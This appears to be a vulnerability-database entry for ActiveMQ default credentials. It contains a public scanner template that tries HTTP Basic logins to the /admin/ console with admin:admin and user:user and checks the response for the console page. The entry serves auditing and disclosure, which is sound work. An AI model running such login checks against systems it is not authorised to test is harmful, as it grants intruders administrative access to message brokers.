activemq-default-password: ActiveMQ Default Password

日期: 2025-08-01 | 影响软件: ActiveMQ | POC: 已公开

漏洞描述

Apache ActiveMQ default login information was discovered.

PoC代码[已公开]

id: activemq-default-password

info:
  name: ActiveMQ Default Password
  author: pa55w0rd
  severity: high
  verified: true
  description: |-
    Apache ActiveMQ default login information was discovered.
  reference:
    - https://knowledge.broadcom.com/external/article/142813/vulnerability-apache-activemq-admin-con.html
    - https://nvd.nist.gov/vuln/detail/CVE-2025-53833
  tags: apache,activemq,default-login
  created: 2023/06/17

set:
  admin: "base64('admin:admin')"
  user: "base64('user:user')"
rules:
  r0:
    request:
      method: GET
      path: /admin/
      headers:
        Authorization: Basic {{admin}}
    expression: |
      response.status == 200 && 
      response.body.ibcontains(b"Welcome to the Apache ActiveMQ Console of") && 
      response.body.bcontains(b"<h2>Broker</h2>")
  r1:
    request:
      method: GET
      path: /admin/
      headers:
        Authorization: Basic {{user}}
    expression: |
      response.status == 200 && 
      response.body.ibcontains(b"Welcome to the Apache ActiveMQ Console of") && 
      response.body.bcontains(b"<h2>Broker</h2>")
expression: r0() || r1()

相关漏洞推荐